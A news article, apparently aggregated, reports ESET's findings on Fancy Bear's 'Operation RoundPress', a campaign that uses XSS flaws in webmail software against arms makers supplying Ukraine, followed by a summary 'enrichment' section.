Russian Hackers Take Aim at Ukraine's Arms Suppliers: A Deep Dive into the Fancy Bear Cyberattacks
Unknown entities launch cyberattacks on Ukrainian weapon manufacturers - Cybercriminals Zero In on Defense Companies in Ukraine
Bringing You Closer to the Chaos
The notorious Russian cyberespionage group, Fancy Bear, also known as Sednit or APT28, has been launching targeted attacks against arms manufacturers supplying weapons to Ukraine. This information comes from a recent study by the Slovak security firm Eset, based in Bratislava. The hacking primarily focuses on producers of Soviet-era weaponry in Bulgaria, Romania, Ukraine, and even Africa and South America.
From the Bundestag to Your Mailbox
Fancy Bear has been labeled as the mastermind behind attacks on high-profile targets such as the German Bundestag (2015), US politician Hillary Clinton (2016), and the SPD party headquarters (2023). The group is considered part of a larger Russian intelligence service strategy to use cyberattacks for political influence and destabilization.
Into the Inbox Jungle
The current intelligence operation, called "Operation RoundPress," uses a cunning technique to exploit vulnerabilities in popular webmail software like Roundcube, Zimbra, Horde, and MDaemon. Many of these weaknesses could be eliminated with proper software maintenance. In some instances, affected companies were virtually helpless due to an unknown vulnerability in MDaemon that initially couldn't be patched.
Malicious Mailings
According to Eset researchers, the attacks start with fake news articles emailed to the targets. The sender uses a trustworthy source, like the Kyiv Post or Bulgarian news portal News.bg, to compromise the email's credibility. The user opens the email in a web browser, unwittingly triggering hidden malware.
No Room to Run
This malware, named "SpyPress.MDAEMON," can not only swipe login credentials and monitor emails but can also bypass two-factor authentication (2FA). Hackers commonly use application passwords to establish permanent access to mailboxes, bypassing 2FA security measures that require both a password and a second form of verification.
Cybersecurity Alert!
Researcher Matthieu Faou from Eset offers a terrifying warning: many companies still operate outdated webmail servers. All it takes for the malware to execute is for the user to view an email in the browser.
- Cybersecurity
- Ukraine
- Hacking group
- Bratislava
- Arms companies
- Russia
- Software
- Bulgaria
- Romania
- Africa
- South America
- Bundestag
- Hillary Clinton
- SPD
Enrichment Data:Identifying Operation RoundPress
Operation RoundPress is a multi-pronged campaign launched by Fancy Bear, a Russian cyberespionage group linked to the Main Intelligence Directorate (GRU). Its goal is to target and compromise organizations involved in the supply of weapons to Ukraine, government entities, and defense contractors across various countries such as Bulgaria, Romania, and even Africa and South America.
Fancy Bear's Methods
- Exploitation of Webmail Software Vulnerabilities: Fancy Bear has been exploiting cross-site scripting (XSS) vulnerabilities in webmail software like Roundcube, Horde, MDaemon, and Zimbra. This allows it to inject malicious JavaScript code into victims' webmail pages, facilitating the theft of credentials and exfiltration of sensitive information.
- Spearphishing Campaigns: Fancy Bear employs spearphishing emails to deliver XSS exploits, designed to trick high-ranking officials into opening malicious content, which then injects harmful code into their webmail pages.
- Bypassing Two-Factor Authentication (2FA): Although there are no specific details on Fancy Bear bypassing 2FA in this context, the group is known for using methods to circumvent security measures, including 2FA, by exploiting vulnerabilities in authentication processes or social engineering tactics to obtain necessary credentials.
- Investigations of Operation RoundPress, a campaign by the Russian hacking group Fancy Bear, reveal they are targeting arms companies in EC countries like Bulgaria, Romania, Ukraine, as well as Africa and South America, aiming to steal sensitive information related to the supply of weapons to Ukraine.
- Researchers from Bratislava-based security firm Eset have identified that Fancy Bear uses exploitation of webmail software vulnerabilities, such as Roundcube, Horde, MDaemon, and Zimbra, to bypass 2FA security measures, enabling them to steal login credentials and monitor emails.
- The hacking group Fancy Bear, infamous for attacks on high-profile targets like the German Bundestag and US politician Hillary Clinton, is reported to be connected to the Main Intelligence Directorate (GRU) of Russia, using cyberattacks as a means to exert political influence and destabilize regions, such as Eastern Europe and Ukraine.
